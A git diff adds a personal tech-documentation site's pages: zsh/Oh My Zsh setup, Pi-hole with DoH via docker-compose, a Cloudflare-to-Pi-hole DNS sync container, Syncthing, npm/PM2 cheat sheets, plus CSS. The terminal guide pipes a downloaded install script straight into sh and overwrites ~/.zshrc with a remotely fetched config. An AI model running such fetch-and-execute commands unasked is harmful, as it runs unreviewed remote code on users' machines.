Limitations Google's API is limited to 100 threads per request - a single script's run. This means that every 5 minutes it runs it will mark 100 emails as read. Since the script is run every 5 minutes, it won't take long to mark all emails as read automatically. If you aren't able to wait you can do it mark emails as read manually.
Troubleshooting I've seen this script working without any issues for months, But suddenly you may receive an email with the Automatically Mark Archived Email as Read
failing to run all the time. The reason is that the script lost
the Gmail permissions. The solution is to run the script manually and grant the script the necessary permissions as the first time.
Back to top
\ No newline at end of file
diff --git a/automation/guides/better-terminal-experience/index.html b/automation/guides/better-terminal-experience/index.html
new file mode 100644
index 000000000..88b53b626
--- /dev/null
+++ b/automation/guides/better-terminal-experience/index.html
@@ -0,0 +1,181 @@
+
Better Terminal Experience - 3os macos linux terminal zsh oh-my-zsh Better Terminal Experience
Introduction I have been using terminal for a long time, it's one of my essential tools for my everyday work and hobbies. The default terminal experience is not very user friendly, and I find it sometimes frustrating to use for basic tasks. So I decided to improve my terminal experience for macOS and Linux without too much effort from the user side. This guide will help you to install and configure the **better terminal experience in less than 5 minutes.
Better Terminal Experience guide based on ZSH Shell with Oh My Zsh on top of it. Using built-in theme called Bira
, zsh auto suggestions plugin that suggests commands as you type based on history and completions and zsh syntax highlighting plugin that highlighting of commands whilst they are typed at a zsh prompt into an interactive terminal.
What's ZSH Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
What's Oh-My-Zsh Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
Installation Requirements Install the following requirements packages with the following commands:
Oh My Zsh We can proceed to install Oh My Zsh with the following command:
sh -c " $( wget https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -) "
+
Answer Yes when asked to change the default shell to zsh.
Install Autosuggestions, Syntax-Highlighting Plugins using git clone:
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting
+git clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions
+
Configuration Oh My Zsh crates a default configuration file called .zshrc
in the user's home directory.
We need to edit the configuration file. You can use any editor to edit the file.
nano example:
We need to add or change the following lines to the configuration file:
Find the theme and change it to bira
find the plugins
and change it to the following:
plugins =( git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)
+
The autosuggestions plugin has a bug with copy and paste so there is a workaround for that. Append the following to the end of the config to activate the workaround.
## Fix for Slow zsh-autosuggestions copy&paste
+autoload -Uz bracketed-paste-magic
+zle -N bracketed-paste bracketed-paste-magic
+zstyle ':bracketed-paste-magic' active-widgets '.self-*'
+
Save and exit the file. Open new terminal window and enjoy Better Terminal Experience!
I've made a personal theme 3os based on the Bira theme with some tweaks.
Danger
The following commands will overwrite your current config if exists.
Make sure you have a backup of your config before proceeding!!!
wget -O ~/.oh-my-zsh/themes/3os.zsh-theme https://3os.org/assets/zsh/3os.zsh-theme
+wget -O ~/.zshrc https://3os.org/assets/zsh/zshrc_config
+
Back to top
\ No newline at end of file
diff --git a/automation/guides/pihole-doh/index.html b/automation/guides/pihole-doh/index.html
new file mode 100644
index 000000000..a623840be
--- /dev/null
+++ b/automation/guides/pihole-doh/index.html
@@ -0,0 +1,237 @@
+
Pi-hole with DOH on Docker - 3os pi-hole doh docker dns dns-over-https Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 Pi-hole as DNS Server with DNS over HTTPS (DOH) Based on Docker Containers
What's Pi-hole? Pi-hole Official Website Official Website .
Pi-hole is a DNS server that is designed to block ads and trackers. It is a free and open source software project. It's based on blocklists and acts as a DNS sinkhole.
What's DNS over HTTPS (DOH)? DNS over HTTPS (DoH) is an internet security protocol that communicates domain name server information in an encrypted way over HTTPS connections.
My Pi-hole Setup My setup fully depends on pi-hole dns server, that's why I use two servers one as primary DNS Server and the second as secondary DNS server.
I've configured my router as a DNS server for all the DHCP clients with primary and the secondary DNS as my pi-hole servers. This way all the clients requests the router to resolve the DNS and the router forwards the request to the pi-hole servers.
Pi-hole-1 runs on ubuntu server (virtual machine) Pi-hole-2 runs on Raspberry Pi Warning
This is not a step by step guide for all the configurations of pihole or how to use docker containers. The following instuctions include only the deployemt of the pi-hole server with DoH providers.
Installation We Will be using docker-compose
to deploy the pi-hole server with DoH providers with a single configuration file.
The following docker-compose.yml includes two images: Pi-hole container , and cloudflared container . When you run docker-compose up
the containers will be created and started. I't will create internal network for the pihole and two instances of cloudflared. When a request comes in the pihole will forward the request to the cloudflared instances one of them will use Cloudflare DNS servers and the other will use Google's DNS servers. There is no need to configure the pihole's DNS server at the UI since the configuration is done by docker-compose.yml
file.
When using this setup two folders will be created on the Host machine for persistent storage of the containers: config, dnsmasq.d
. Those folders will be mounted to the containers when its running/restarted/recreated. Those folders will be created at the root folder of the docker-compose.yml file.
Create a folder for the deployment of the containers at your host machine. create a file named docker-compose.yml
at the root folder and copy the following content to it:
version : '2.4'
+
+services :
+ pihole :
+ container_name : pihole
+ hostname : pihole
+ restart : always
+ image : pihole/pihole
+ networks :
+ dns :
+ ipv4_address : 172.20.0.9
+ depends_on :
+ google-8.8.8.8 :
+ condition : service_started
+ cloudflare-1.1.1.1 :
+ condition : service_started
+ volumes :
+ - ./config:/etc/pihole/
+ - ./dnsmasq.d:/etc/dnsmasq.d/
+ - /etc/localtime:/etc/localtime
+ ports :
+ - '7003:80'
+ - '53:53/tcp'
+ - '53:53/udp'
+ environment :
+ - ServerIP=127.0.0.1
+ - WEBPASSWORD=ChangeMe
+ - PIHOLE_DNS_=172.20.0.10;172.20.0.12
+
+ cloudflare-1.1.1.1 :
+ container_name : cloudflare-1.1.1.1
+ hostname : cloudflare-1.1.1.1
+ restart : always
+ image : visibilityspots/cloudflared
+ networks :
+ dns :
+ ipv4_address : 172.20.0.10
+ expose :
+ - '53/tcp'
+ - '53/udp'
+ environment :
+ - PORT=53
+ - UPSTREAM1=https://1.1.1.1/dns-query
+ - UPSTREAM2=https://1.1.1.1/dns-query
+ volumes :
+ - /etc/localtime:/etc/localtime
+
+ google-8.8.8.8 :
+ container_name : google-8.8.8.8
+ hostname : google-8.8.8.8
+ restart : always
+ image : visibilityspots/cloudflared
+ networks :
+ dns :
+ ipv4_address : 172.20.0.12
+ expose :
+ - '53/tcp'
+ - '53/udp'
+ environment :
+ - PORT=53
+ - UPSTREAM1=https://8.8.8.8/dns-query
+ - UPSTREAM2=https://8.8.8.8/dns-query
+ volumes :
+ - /etc/localtime:/etc/localtime
+
+networks :
+ dns :
+ ipam :
+ config :
+ - subnet : 172.20.0.0/24
+
Now run docker-compose up -d
to create the containers. If all went well you should should be able to access the pihole server at http://127.0.0.1.7003
with password ChangeMe
from the config above.
Now you need to change your dns server to point to the pihole server. We are done with the installation.
Back to top
\ No newline at end of file
diff --git a/automation/pihole-cloudflare-dns-sync/index.html b/automation/pihole-cloudflare-dns-sync/index.html
new file mode 100644
index 000000000..725eedc2a
--- /dev/null
+++ b/automation/pihole-cloudflare-dns-sync/index.html
@@ -0,0 +1,210 @@
+
Pi-hole Cloudflare DNS Sync - 3os pi-hole docker dns cloudflare Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-05 Pi-hole Cloudflare DNS Sync Pihole Cloudflare DNS Sync Github Repository . Pihole Cloudflare DNS Sync Docker Hub Page .
Description Lightweight Container image based on python:3.9.13-alpine to be used in conjunction with a Pi-hole instance to sync the DNS records from Cloudflare DNS Service to Pi-hole local DNS .
Supports A records CNAME records Any type of Pi-hole instance Requirements Cloudflare API Readonly Token Pi-hole instance Creating a Cloudflare API token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Read Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Parameters Parameter Description Default Type Required CLOUDFLARE_API_TOKEN Cloudflare API Token change_me string Yes CLOUDFLARE_DOMAIN Cloudflare Domain example.com string Yes EXCLUDE_PROXIED_RECORDS Exclude Proxied Records yes string Yes PIHOLE_HOST Pi-hole hostname/IP 123.123.123.123 string Yes PIHOLE_PORT Pi-hole port 80 integer Yes USE_HTTPS http/https for pihole no string Yes PIHOLE_PASSWORD Pi-hole password change_me string Yes RUN_EVERY Run very x minute 5 integer Yes
Usage Docker run example:
docker run -d \
+ --name pihole-cloudflare-dns-sync \
+ -h pihole-cloudflare-dns-sync \
+ --restart always \
+ -v /etc/timezone:/etc/timezone:ro \
+ -v /etc/localtime:/etc/localtime:ro \
+ -e CLOUDFLARE_API_TOKEN = cloudflare_secret_dns_zone_api_token \
+ -e CLOUDFLARE_DOMAIN = example.com \
+ -e EXCLUDE_PROXIED_RECORDS = yes \
+ -e PIHOLE_HOST = 123 .123.123.123 \
+ -e PIHOLE_PORT = 80 \
+ -e USE_HTTPS = no \
+ -e PIHOLE_PASSWORD = secret \
+ -e RUN_EVERY = 1 \
+ -e PUID = 1000 \
+ -e PGID = 1000 \
+fire1ce/pihole-cloudflare-dns-sync
+
Docker compose example:
version: '3'
+
+services:
+ pihole-cloudflare-dns-sync:
+ image: fire1ce/pihole-cloudflare-dns-sync
+ container_name: pihole-cloudflare-dns-sync
+ hostname: pihole-cloudflare-dns-sync
+ restart: always
+ network_mode: bridge
+ volumes:
+ - /etc/timezone:/etc/timezone:ro
+ - /etc/localtime:/etc/localtime:ro
+ environment:
+ - CLOUDFLARE_API_TOKEN=cloudflare_secret_dns_zone_api_token
+ - CLOUDFLARE_DOMAIN=example.com
+ - EXCLUDE_PROXIED_RECORDS=yes
+ - PIHOLE_HOST=123.123.123.123
+ - PIHOLE_PORT=80
+ - USE_HTTPS=no
+ - PIHOLE_PASSWORD=secret
+ - RUN_EVERY=1
+ - PUID=1000
+ - PGID=1000
+
License This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details
Back to top
\ No newline at end of file
diff --git a/automation/syncthings/index.html b/automation/syncthings/index.html
new file mode 100644
index 000000000..9cfdeff27
--- /dev/null
+++ b/automation/syncthings/index.html
@@ -0,0 +1,272 @@
+
Syncthing - 3os syncthing automation linux macos synology windows Authors: fire1ce | Created: 2022-04-21 | Last update: 2022-08-27 Syncthing
Syncthing is a continuous file synchronization program. Syncthing is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices.
Official website: syncthing.net
Debian/Ubuntu Installation We need to add the following Syncthing
repository to the system.
First, we need to add PGP keys to allow the system to check the packages authenticity
sudo curl -s -o /usr/share/keyrings/syncthing-archive-keyring.gpg https://syncthing.net/release-key.gpg
+
Then we will add the stable Syncthing
repository channel to your APT sources
echo "deb [signed-by=/usr/share/keyrings/syncthing-archive-keyring.gpg] https://apt.syncthing.net/ syncthing stable" | sudo tee /etc/apt/sources.list.d/syncthing.list
+
Now we can update the package list and install Syncthing
sudo apt update
+sudo apt install syncthing
+
Configuration Syncthing as a Service Configuring Syncthing as a service will provide as the ability to start and stop and enable/disable the service at boot.
Create a systemd unit file for managing the Syncthing service.
nano /etc/systemd/system/syncthing@.service
+
In the next example we will be setting the Syncthing
service UI to listen on local host (127.0.0.1) and port 8384
Add the following lines to the syncthing@.service
:
[Unit]
+Description = Syncthing - Open Source Continuous File Synchronization for % I
+Documentation = man : syncthing ( 1 )
+After = network . target
+
+[Service]
+User = % i
+ExecStart = / usr / bin / syncthing - no-browser - gui-address = "127.0.0.1:8384" - no-restart - logflags = 0
+Restart = on-failure
+SuccessExitStatus = 3 4
+RestartForceExitStatus = 3 4
+
+[Install]
+WantedBy = multi-user . target
+
Save and close the file when you are finished. Then, reload the systemd daemon to apply the configuration:
systemctl daemon-reload
+
Next, start the Syncthing service with the following command depending on a user this example is root
systemctl start syncthing@root
+
To verify the status of the Syncthing service, run the following command:
systemctl status syncthing@root
+
Finally, enabled the syncthing service on boot
systemctl enable syncthing@root
+
MacOS Installation You can download the MacOS installation package from Syncthing Downloads , But my preferred way is to use the Homebrew package manager.
brew install --cask syncthing
+
Windows Installation Window installation from Syncthing Downloads installs the Syncthing as a service without any system tray icon or menu.
The best way I found is to use SyncTrayzor
from SyncTrayzor Github Page . It hosts and wraps Syncthing, making it behave more like a native Windows application and less like a command-line utility with a web browser interface.
You can also instal it win winget
with the following command:
winget install SyncTrayzor . SyncTrayzor
+
Synology DSM Installation In order to install Syncthing, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
After we added Synology Community Packages
you will be able to install Syncthing from the Cummunity
tab.
Permissions for the Syncthing service will be handled by the new system user sc-syncthing
Syncthing Configuration The following configuration are the same for all the installation methods. I'm no going to cover the basic configuration, but I will show you some of my personal preferences.
First to configure the Syncthing we need to access it's Web UI. The Default url is http://127.0.0.1:8384
If you are using Syncthing
at remote Linux host, you can use SSH tunnel to access the Web UI.
ssh -L 8001 :127.0.0.1:8384 root@192.168.102.6
+
This will forward 127.0.0.1:8384
from the remote host to 127.0.0.1:8001
on the local host.
For security reasons, I like to disable all the Discovery and Repay services.
When you disable the Discovery service, you will have to manually add the connection to other devices.
Manual Connection Example tcp://192.168.1.1:22000
+
or
tcp://example.com:22000
+
Syncthing Files Ignore Patterns Syncthing supports of Ignore Patterns
you can use it to Ignore Files
synchronization. This will save you a lot of headaches with sync errors
Here is a list of the Ignore Patterns
for system files:
// Apple macOS
+(?d).DS_Store
+(?d).localized
+(?d)._*
+(?d).Icon*
+(?d).fseventsd
+(?d).Spotlight-V100
+(?d).DocumentRevisions-V100
+(?d).TemporaryItems
+(?d).Trashes
+(?d).Trash-1000
+(?d).iCloud
+(?d)Photos Library.photoslibrary
+
+// GNU/Linux
+(?d).directory
+(?d).Trash-*
+
+// Microsoft Windows
+(?d)desktop.ini
+(?d)ehthumbs.db
+(?d)Thumbs.db
+(?d)$RECYCLE.BIN
+(?d)System Volume Information
+
+// QNAP QTS
+(?d).AppleDB
+(?d).@_thumb
+(?d).@__thumb
+
+// Synology DSM
+(?d)@eaDir
+
+// Adobe Lightroom
+*Previews.lrdata root-pixels.db
+
+// Dropbox
+.dropbox
+.dropbox.attr
+
+// Firefox & Chrome
+*.part
+*.crdownload
+
+// Microsoft Office
+~*
+
+// Parallels Desktop for Mac
+.parallels-vm-directory
+
+// Resilio Sync
+.sync
+*.bts
+*.!Sync
+.SyncID
+.SyncIgnore
+.SyncArchive
+*.SyncPart
+*.SyncTemp
+*.SyncOld
+
+// Temporary and backup files
+*.temporary
+*.tmp
+*._mp
+*.old
+*.syd
+*.dir
+*.gid
+*.chk
+*.dmp
+*.nch
+.*.swp
+*~
+
+// Vim
+*.*.sw[a-p]
+
Example of working Syncthing
Web UI:
Back to top
\ No newline at end of file
diff --git a/blog/index.html b/blog/index.html
new file mode 100644
index 000000000..870a2c45b
--- /dev/null
+++ b/blog/index.html
@@ -0,0 +1,147 @@
+
Blog - News & Updates - 3os Authors: fire1ce | Created: 2021-09-12 | Last update: 2022-12-19 Blog - News & Updates Updated MacOS Section (18/06/22) Updated the MacOS section of the website. Some content has been added and removed due to deprecation at MacOS section.
New Content (24/04/22) Magic Mirror 2.0 External Power Button ] For Raspberry Pi Wake, Power Off, Restart(Double Press) Raspberry Pi - Motion Sensor Display Control
New Content (22/04/22) Proxmox SSL with Let's Encrypt and Cloudflare DNS Challenge
New Content (21/04/22) Syncthings is an application that allows you to synchronize files between multiple devices. This means that creating, editing, or deleting files on one computer can be automatically copied to other devices. iGPU Passthrough In Proxmox Server iGPU Split Passthrough In Proxmox Server GPU Passthrough In Proxmox Server Windows SSH Server - configure Windows SSH Server with RSA keys and PowerShell shell.
New Design and Features (15/03/22) I've been working on the new design and new features for a while now. Most of the work was done on the backend for this website including CI/CD, and Cloudflare workers. Some of the new features include: Tags and Comments on pages. This feature will be implemented on most of the pages in the future.
Bettercap 1.6.2 tool for man in the middle attack and ssl strip Metasploit Framework Metasploit Framework, a tool for developing and executing exploit code against a remote target machine Wifite Wifite is an automated wireless attack tool
Proxmark Section (12/09/21) Added Proxmark
section at Penetration Testing. New page About Proxmark device, RFID Tags and where to get them New page Proxmark3 CheatSheet - at very basic level New page Mifare Classic 1K ISO14443A - how to clone Mifare1k tags
ADB CheatSheet (12/09/21) Added ADB CheatSheet page to Penetration Testing - Android. You will find a series of practical example commands for running ADB and getting the most of Android Debug Bridge powerful tool
Back to top
\ No newline at end of file
diff --git a/circuitboard.svg b/circuitboard.svg
new file mode 100644
index 000000000..a85440649
--- /dev/null
+++ b/circuitboard.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/css/extra.css b/css/extra.css
new file mode 100644
index 000000000..c08f2347b
--- /dev/null
+++ b/css/extra.css
@@ -0,0 +1,126 @@
+/* custom color palette */
+[data-md-color-scheme='3os'] {
+ --md-primary-fg-color: #006158;
+ --md-typeset-a-color: #009485;
+}
+[data-md-color-scheme='slate'] {
+ --md-primary-fg-color: #006158;
+ --md-typeset-a-color: #00c5b1;
+}
+
+[data-md-color-scheme='slate'] {
+ --md-hue: 215;
+}
+/* border-radius of the code section*/
+.md-typeset code {
+ border-radius: 5px;
+}
+
+/* images css */
+.md-typeset img {
+ border-radius: 5px;
+ height: auto;
+ max-width: 95%;
+ margin: auto;
+ display: block;
+ box-shadow: rgba(149, 157, 165, 0.2) 0px 8px 24px;
+}
+
+/* The width of the content area */
+.md-grid {
+ max-width: 1560px;
+}
+
+/* ads padding side bar*/
+
+.ads-sidebar {
+ margin: auto;
+ padding: 0.5rem;
+}
+
+
+/* support buttons */
+
+.donation {
+ padding: 0 0.6rem;
+}
+
+.donate-button-paypal {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/paypal.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-patreon {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/patreon.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-buymeacoffee {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/buymeacoffee.svg');
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+.donate-button-github-sponsers {
+ width: 6rem;
+ height: 2rem;
+ background-image: url('/assets/images/support/github-sponsers.svg');
+ background-color: #ffffff;
+ background-size: contain;
+ background-repeat: no-repeat;
+ cursor: pointer;
+ margin-bottom: 0.5rem;
+ border-radius: 5px;
+ color: transparent;
+}
+
+/* Githubs Tables */
+th,
+td {
+ border: 1px solid var(--md-typeset-table-color);
+ border-spacing: 0;
+ border-bottom: none;
+ border-left: none;
+ border-top: none;
+}
+
+.md-typeset__table table:not([class]) {
+ border-right: none;
+}
+
+.md-typeset__table table:not([class]) td,
+.md-typeset__table table:not([class]) th {
+ padding: 9px;
+}
+
+/* light mode alternating table bg colors */
+.md-typeset__table tr:nth-child(2n) {
+ background-color: #f8f8f8;
+}
+
+/* dark mode alternating table bg colors */
+[data-md-color-scheme='slate'] .md-typeset__table tr:nth-child(2n) {
+ background-color: hsla(var(--md-hue), 25%, 25%, 1);
+}
+
+/* Githubs Tables end */
diff --git a/css/fonts.css b/css/fonts.css
new file mode 100644
index 000000000..665b3b8e7
--- /dev/null
+++ b/css/fonts.css
@@ -0,0 +1,150 @@
+/* rubik-300 - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 300;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-300.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-300.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-300.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-300.woff')
+ format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-300.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-300.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-regular - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-regular.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-regular.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-regular.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/Rubik/rubik-v14-latin-regular.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-regular.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-regular.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-700 - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: normal;
+ font-weight: 700;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-700.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-700.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-700.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-700.woff')
+ format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-700.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-700.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+/* rubik-italic - latin */
+@font-face {
+ font-family: 'Rubik';
+ font-style: italic;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/Rubik/rubik-v14-latin-italic.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/Rubik/rubik-v14-latin-italic.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/Rubik/rubik-v14-latin-italic.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/Rubik/rubik-v14-latin-italic.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/Rubik/rubik-v14-latin-italic.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/Rubik/rubik-v14-latin-italic.svg#Rubik') format('svg'); /* Legacy iOS */
+}
+
+/* fira-code-300 - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 300;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-300.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-300.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-300.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-300.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/FiraCode/fira-code-v12-latin-300.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-300.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+/* fira-code-regular - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 400;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-regular.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-regular.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.woff') format('woff'),
+ /* Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-regular.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+/* fira-code-700 - latin */
+@font-face {
+ font-family: 'Fira Code';
+ font-style: normal;
+ font-weight: 700;
+ font-display: swap;
+ src: url('../fonts/FiraCode/fira-code-v12-latin-700.eot'); /* IE9 Compat Modes */
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('../fonts/FiraCode/fira-code-v12-latin-700.eot?#iefix')
+ format('embedded-opentype'),
+ /* IE6-IE8 */ url('../fonts/FiraCode/fira-code-v12-latin-700.woff2')
+ format('woff2'),
+ /* Super Modern Browsers */
+ url('../fonts/FiraCode/fira-code-v12-latin-700.woff') format('woff'),
+ /* Modern Browsers */ url('../fonts/FiraCode/fira-code-v12-latin-700.ttf')
+ format('truetype'),
+ /* Safari, Android, iOS */
+ url('../fonts/FiraCode/fira-code-v12-latin-700.svg#FiraCode')
+ format('svg'); /* Legacy iOS */
+}
+
+body,
+input {
+ font-family: 'Rubik', -apple-system, Helvetica, Arial, sans-serif;
+}
+
+pre,
+code,
+kbd {
+ font-family: 'Fira Code', -apple-system, Helvetica, Arial, sans-serif;
+}
+/* END MKDOCS TEMPLATE */
diff --git a/css/timeago.css b/css/timeago.css
new file mode 100644
index 000000000..f7ab7d69b
--- /dev/null
+++ b/css/timeago.css
@@ -0,0 +1,15 @@
+/*
+ timeago output is dynamic, which breaks when you print a page.
+
+ This CSS is only included when type: timeago
+ and ensures fallback to type "iso_date" when printing.
+
+ */
+
+.git-revision-date-localized-plugin-iso_date { display: none }
+
+@media print {
+ .git-revision-date-localized-plugin-iso_date { display: inline }
+ .git-revision-date-localized-plugin-timeago { display: none }
+}
+
diff --git a/development/node-npm/npm/index.html b/development/node-npm/npm/index.html
new file mode 100644
index 000000000..423bb81ad
--- /dev/null
+++ b/development/node-npm/npm/index.html
@@ -0,0 +1,176 @@
+
Npm Command-line Utility - 3os npm cheat-sheet node Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-09 Npm Command-line Utility npm is two things: first and foremost, it is an online repository for the publishing of open-source Node.js projects; second, it is a command-line utility for interacting with said repository that aids in package installation, version management, and dependency management. A plethora of Node.js libraries and applications are published on npm, and many more are added every day.
Updating Node & npm to Latest Stable Version npm:
node:
npm cache clean -f
+npm install -g n
+n stable
+
Updating Local Project Packages Navigate to the root directory of your project and ensure it contains a package.json In your project root directory, run:
To test the update, run the outdated
command. There should not be any output .
Updating Globally-Installed Packages To see which global packages need to be updated, on the command line, run:
npm outdated -g --depth= 0
+
To update a single global package, on the command line, run:
npm update -g <package_name>
+
To update all global packages, on the command line, run:
Back to top
\ No newline at end of file
diff --git a/development/node-npm/pm2/index.html b/development/node-npm/pm2/index.html
new file mode 100644
index 000000000..b76d4103d
--- /dev/null
+++ b/development/node-npm/pm2/index.html
@@ -0,0 +1,187 @@
+
PM2 - Node.js Process Manager - 3os npm node pm2 cheat-sheet process-manager Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-04-09 PM2 - Node.js Process Manager PM2 is a daemon process manager that will help you manage and keep your application online. Getting started with PM2 is straightforward, it is offered as a simple and intuitive CLI, installable via NPM.
Follow the official documentation for installation and usage instructions: PM2 Official Documentation
Installation The latest PM2 version is installable with NPM or Yarn:
npm install pm2@latest -g
+# or
+yarn global add pm2
+
Start An Application With PM2 The simplest way to start, daemonize and monitor your application is by using this command line:
Start Application With Detailed Time For Logs pm2 start app.js --log-date-format "YYYY-MM-DD HH:mm:ss"
+
Managing Processes Managing application state is simple here are the commands:
pm2 restart app_name
+pm2 reload app_name
+pm2 stop app_name
+pm2 delete app_name
+
Save Configuration of Processes to PM2 And to freeze a process list for automatic respawn:
List Managed Applications List the status of all application managed by PM2:
Display Logs To display logs in realtime for all processes managed by PM2, use the following command:
To display logs in realtime for all processes managed by PM2, for last 200 lines use the following command:
To display logs in realtime for specific process, use the following command:
pm2 logs <app_name>/<id>
+
To display logs in realtime for specific process, for last 200 lines use the following command:
pm2 logs <app_name>/<id> --lines 200
+
Auto Startup PM2 Restarting PM2 with the processes you manage on server boot/reboot is critical. To solve this, just run this command to generate an active startup script:
Auto Startup PM2 on Raspberry Pi When using PM2 on Raspberry Pi . You will encounter a problem when you try to start pm2 with the default command.
sudo env PATH = $PATH :/usr/local/bin pm2 startup systemd -u pi --hp /home/pi
+
Updating PM2 It's very useful to update PM2 to the latest version specially when you update your Node.js version. Since updating node usually will brake the pm2 process to function properly, you can use the following command to update PM2:
npm install pm2@latest -g
+
Then update the in-memory PM2:
You can also create a alias
to update PM2 with one command:
alias pm2update = 'npm install pm2@latest -g && pm2 update && pm2 save'
+
Back to top
\ No newline at end of file
diff --git a/development/python/pip/index.html b/development/python/pip/index.html
new file mode 100644
index 000000000..86e0c68fb
--- /dev/null
+++ b/development/python/pip/index.html
@@ -0,0 +1,174 @@
+
